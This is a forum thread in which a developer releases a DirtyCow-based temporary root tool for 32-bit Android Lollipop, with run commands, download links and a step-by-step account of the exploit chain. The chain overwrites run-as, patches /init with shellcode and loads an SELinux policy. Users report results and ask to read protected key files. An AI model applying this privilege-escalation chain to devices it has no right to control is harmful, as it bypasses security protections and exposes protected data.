Root tool DirtyCow Apk && adb

kryz

Senior Member
Oct 25, 2009
109
126
0
Hi,
I have developed a tool to exploit the dirtycow vulnerability and get TEMPORAL ROOT
It bypass the selinux in lollipop 32bits system only, we are working now in a 64bits and Marshmallow version and will be soon, have a lot of work to do it universal.
Im bringing 2 tools, one apk (no computer required) and one rar for adb and linux.
With this tool we will access to those partitions and start the attack there, but in the actual state if you have locked your bootloader a good choice is to have root even temporal one.

·APK
Required: SDCARD
The apk exploits this vuln in the vold context so, is necessary to have a sdcard and mount or extract it, when the app requires, one time per session.
This tool has some utilities for flash boot and system partition, also for backup and 2 methods of root:
·Attack init process (lollipop 32 bits only)
·Attack app_process.(all devices, not really good)

·Get root
Uninstall any supersu manager before root.
The way to use this app is first click in check perms(optional) and you will see if you have permissions to /init file.
If you have permisisons and lollipop 32 you can use the first method to get root.
Also in check permissions you will see if you have rights to backup/flash boot and system partition.
The process takes until 2 minutes to finish so wait please and watch the log window.
# ISSUES #
If you get reboot after get root you can:
-Clean init (restore init process sometimes crash the device, but is safe)
-Install selinux permissive (Set permanent the new selinux policy, not tested)
The first option is safe you just can get a reboot.
The second option is just tested in 3 devices(oppo,xperia,Moto E), so test it with a recovery system working, can break some selinux rule..


·ADB
The adb rar contains some utilities to get root via run-as and init and is only working in Lollipop 32bits.
To execute it:

-Pass rar:"nox"
-Extract the rar in /data/local/tmp/


Code:
chmod 755 /data/local/tmp/exploit.sh
cd /data/local/tmp/
./exploit.sh
This process take some time 1-2 minutes but you will see the progress in the console, please wait,
After will ask to turn off bluetooth do even sometimes is not required, it can accelerate the process.
It will ask to install selinux permissive, if you don't have reboot problems, don't install it, otherwise be sure you have a recovery system working and a stock rom ready to flash, this feature is stable but need more testing.
if all is ok you will see this:

Code:
#Type run-as -s1 to get a shell"
#Type run-as -s2 to execute su daemon"
The run-as -s1 give you a shell with init context but some restrictions because selinux autotransfer domain to run-as
The run-as -s2 will execute su dameon and a su init context with no restrictions.
# ISSUES #
If you get reboot after get root you can:
·mount system partition with flag abort:
Code:
mount -o remount,abort /system
You won't able to mount system in write mode.


This app is in BETA BETA state for now, just 7/9 devices passed not bad at all ;)
I'll add more devices in the list soon ;)

List of rooted devices:
Moto G 5.1 lollipop
Xperia 5.1 lollipop
Oppo 5.1 lollipop
Emulator 5.1 lollipop
XT1528 (MOTO E Verizon prepaid) 5.0.2 lollipop(reboot issues)
Asus Zenfone Go ZB452KG Lollipop(5.1.1)
Smartfren Andromax A / Haier a16c3h (Lollipop 5.1 Firmware 12.2)


Version:0.4
Adb:http://www.mediafire.com/file/r3i900n7jb2zfoo/EXPLOIT_ADB.rar
Apk:http://www.mediafire.com/file/38tyscsaxms00sa/croowt%282%29.apk
Implemented selinux pemissive after reboot.(adb,apk)
Enforce mode working.(adb,apk)

Version: 0.3
Fixed bug creating bl instruction.

Version: 0.2
-Fix bug in apk for some devices

Version: 0.1
-More compatible adb with lollipop 32 bits
-Fixed bug in the shellcode.
-64 bits version of run-as-dirtycow.

Todo:
-Working in Marshmallow 32 bits.
-Apk some fix.

Thanks to n0x for his great help debugging the shellcode issue in Moto G
 
Last edited:

nemopsp

Senior Member
Nov 30, 2014
327
111
0
Tampa, FL
Sweet ! Has anyone tested on Note 4? N910A on 5.1.1

I'm currently on 6.0.1 MM so I'm waiting for that release.

Anyone know if this will work with the November Security patch of 2016?

Sent from my SAMSUNG-SM-N910A using Tapatalk
 

bornwilder

Member
Aug 17, 2010
49
5
0
Georgetown
Really cool. I am having a problem trying to connect my device over adb wifi and now this!!! I have a locked head unit and i can't install any apps (all installations blocked and developer mode, usb debug all hidden. ) any way for me to install this onto my phone and attack my device via bluetooth or something? Or autorun once connected to usb? It's a long shot but hey its Christmas!!

Merry Christmas by the way
 

kryz

Senior Member
Oct 25, 2009
109
126
0
Exploit process

For the developers that are testing this exploit or want to know how it works deeply:

First we dirtycow some privileged process, for example run-as has suid 0 given by selinux capabilities not by the bit setuid.

When we have overwritten run-as, this binary can read /init path, so we copy to other place with our run-as "trojan".

In our run-as we need to put some code to read files, my run-as-dirtycow does:

run-as /init

Will print this file to the stdout(console), if we redirect this output to a file:

run-as /init > /data/local/tmp/init.dmp

We copy /init file through our dirtycowed run-as that has root privileges, and is permitted by Selinux.

We patch init.dmp to create our init.patch with a shellcode to load new policy.

We will use run-as to dirtycow again our init.dmp but patched with a shellcode.

So our run-as trojan also will have the dirtycow exploit and when we exec this binary with the right arguments also will dirtycow any file with read permissions to root.

run-as /init /data/local/tmp/init.patch

Once finish and when the new policy is loaded exec run-as trojan wiht the special parameter -s1 or -s2 give to you a shell root or install su in the device TEMPORAL, no modifies any partition but mount a ext4 partition in /system/xbin with the su binary.

Well this is the process to do it in adb shell, in the apk i am using fsck_msdos to do all this chain of steps.

I like to get some different init from lollipop 32 bits and Marshmallow 32bits to adjust the patcher to Marshmallow.
 

kryz

Senior Member
Oct 25, 2009
109
126
0
Can we have access to the run-as-dirtycow source code?

Thanks.
Is very simple just have the dirtycow exploit original and some code to copy files read and puts.

Anyways soon ill post here, has no many secrets lol, just copy file or execute sh, the main problem now is the patcher, to make it working in Marshamallow and 64bits, i don't have any device with 64bits, yes one xperiaZ that i can install a custom rom with Marshmallow.

But i think the first is to check if the patcher is working in lollipop32 bits well, even ive tested 2 devices and reversed some other inits is not enough to be completely sure that all is ok.
 

jucaroba

Senior Member
Nov 3, 2012
51
16
28
Is very simple just have the dirtycow exploit original and some code to copy files read and puts.

Anyways soon ill post here, has no many secrets lol, just copy file or execute sh, the main problem now is the patcher, to make it working in Marshamallow and 64bits, i don't have any device with 64bits, yes one xperiaZ that i can install a custom rom with Marshmallow.

But i think the first is to check if the patcher is working in lollipop32 bits well, even ive tested 2 devices and reversed some other inits is not enough to be completely sure that all is ok.
Thanks for your answer.

I'm trying to use your exploit to be able to read my /data/misc/vold/expand_*.key file. My wife has a Moto G 2014 mobile with official (non rooted) Android 6 Marshmallow. The bootloader is locked. She has deleted accidentally all the pictures in her SD card, that is configured as adopted card (not portable). I have made a cloned copy of the SD in my linux laptop with dd command, but I can not mount the partitions in the SD because I have to know the encryption key.

I can not unlock the bootloader, because the phone will be reseted to factory and the encryption key will be deleted. And I can not read the key file without being root, because of the permissions of the file. I have tried your run-as-dirtycow trojan in the phone, and I can read files I have no permissions for, such as /init.rc. The only missing piece now is that I don't know the exact name of the key file. I only know that it is of the form "expand_*.key". Can your trojan run-as-dirtycow be modified to be able to read the files with this pattern name in a given directory?

Thanks in advance.
 
  • Like
Reactions: Silver Surfer 2069

tnomtlaw

Senior Member
Oct 26, 2013
119
20
38
Is very simple just have the dirtycow exploit original and some code to copy files read and puts.

Anyways soon ill post here, has no many secrets lol, just copy file or execute sh, the main problem now is the patcher, to make it working in Marshamallow and 64bits, i don't have any device with 64bits, yes one xperiaZ that i can install a custom rom with Marshmallow.

But i think the first is to check if the patcher is working in lollipop32 bits well, even ive tested 2 devices and reversed some other inits is not enough to be completely sure that all is ok.
I'm trying to root my boost max+ running 5.1.I tried the check perm option but couldn't remount sdcard,it just froze.Upon reboot it hang at starting apps.Had to remove sdcard to get phone to boot properly.

Sent from my N9521 using Tapatalk
 

kryz

Senior Member
Oct 25, 2009
109
126
0
I'm trying to root my boost max+ running 5.1.I tried the check perm option but couldn't remount sdcard,it just froze.Upon reboot it hang at starting apps.Had to remove sdcard to get phone to boot properly.

Sent from my N9521 using Tapatalk
When you mount the sdcard is normal that doesn't mount again, the process hijack fsck_msdos, you have to come back to the application, wait and watch the window log.

It depends on mount will get 1-5 seconds to see the information.

If you see that init is OK, you can proceed with the get root.

 
Last edited:

kryz

Senior Member
Oct 25, 2009
109
126
0
Thanks for your answer.

I'm trying to use your exploit to be able to read my /data/misc/vold/expand_*.key file. My wife has a Moto G 2014 mobile with official (non rooted) Android 6 Marshmallow. The bootloader is locked. She has deleted accidentally all the pictures in her SD card, that is configured as adopted card (not portable). I have made a cloned copy of the SD in my linux laptop with dd command, but I can not mount the partitions in the SD because I have to know the encryption key.

I can not unlock the bootloader, because the phone will be reseted to factory and the encryption key will be deleted. And I can not read the key file without being root, because of the permissions of the file. I have tried your run-as-dirtycow trojan in the phone, and I can read files I have no permissions for, such as /init.rc. The only missing piece now is that I don't know the exact name of the key file. I only know that it is of the form "expand_*.key". Can your trojan run-as-dirtycow be modified to be able to read the files with this pattern name in a given directory?

Thanks in advance.
The run-as context can't see /data or even /data/misc folders, anyways i will implement the list of directories in the next update.
 
Last edited:
  • Like
Reactions: jucaroba

jucaroba

Senior Member
Nov 3, 2012
51
16
28
The run-as context can see /data or even /data/misc folders, anyways i will implement the list of directories in the next update.
Yes, I know it can see those folders, I only need to know the name of the file I am interested in.

If you implement the "list of directories" functionality it will be fantastic. Thanks for it.

I will also be very grateful to see the full source code of the trojan.

Waiting eagerly for both things.

Thanks in advance.
 

kryz

Senior Member
Oct 25, 2009
109
126
0
Yes, I know it can see those folders, I only need to know the name of the file I am interested in.

If you implement the "list of directories" functionality it will be fantastic. Thanks for it.

I will also be very grateful to see the full source code of the trojan.

Waiting eagerly for both things.

Thanks in advance.
Sorry wrong type i wanted to say that run-as context can not see those folders.
I mean ive implemented all ready that function "-d" and run-as can not list those folders:

run-as -d /system/etc

Attached run-as-dirtycow.c
 

Attachments

Last edited:

jucaroba

Senior Member
Nov 3, 2012
51
16
28
Sorry wrong type i wanted to say that run-as context can not see those folders.
I mean ive implemented all ready that function and run-as can not list those folders.
Mmmm, so the only way to be able to read a file in /data/misc/vold/ is to be root?

If that is the case, then I suppose I have to wait til your exploit can be used to root a Marshmallow phone.

Am I correct?

Thanks.
 

kryz

Senior Member
Oct 25, 2009
109
126
0
Mmmm, so the only way to be able to read a file in /data/misc/vold/ is to be root?

If that is the case, then I suppose I have to wait til your exploit can be used to root a Marshmallow phone.

Am I correct?

Thanks.
I think so, i don't have that folder in my devices, but i was trying to read on /data folder and no success in one of its sub folders.
Btw what cpu is your device 32 o 64 bits?
Can you post your init file?
 

jucaroba

Senior Member
Nov 3, 2012
51
16
28
I think so, i don't have that folder in my devices, but i was trying to read on /data folder and no success in one of its sub folders.
Btw what cpu is your device 32 o 64 bits?
Can you post your init file?
My CPU is 32 bits. It is a Moto G 2014.

I suppose you don't have the /data/misc/vold folder because you are not looking at a Marshmallow system.

What file are you interested in? The /init.rc file?
 

kryz

Senior Member
Oct 25, 2009
109
126
0
My CPU is 32 bits. It is a Moto G 2014.

I suppose you don't have the /data/misc/vold folder because you are not looking at a Marshmallow system.

What file are you interested in? The /init.rc file?
I'm interested in /init file and 32 bits is great ;)
 

jucaroba

Senior Member
Nov 3, 2012
51
16
28
I'm interested in /init file and 32 bits is great ;)
No /init file in Marshmallow. At least not in that path.

---------- Post added at 02:19 AM ---------- Previous post was at 01:48 AM ----------

I'm interested in /init file and 32 bits is great ;)
Sorry, the file exist, but I can not read it. I can not copy it with your trojan run-as (run-as-dirtycow) either.
 

norberto_

Senior Member
Jun 16, 2010
163
27
48
Hi kryz,

Please find the /init from 32bit 6.0.1
It is from Xperia Z2 with custom rooted rom (Mx ROM v8.6.0)

How can i copy /init from my boot locked, unrooted, stock 6.0.1 64bit X Performance?
 

Attachments

Last edited: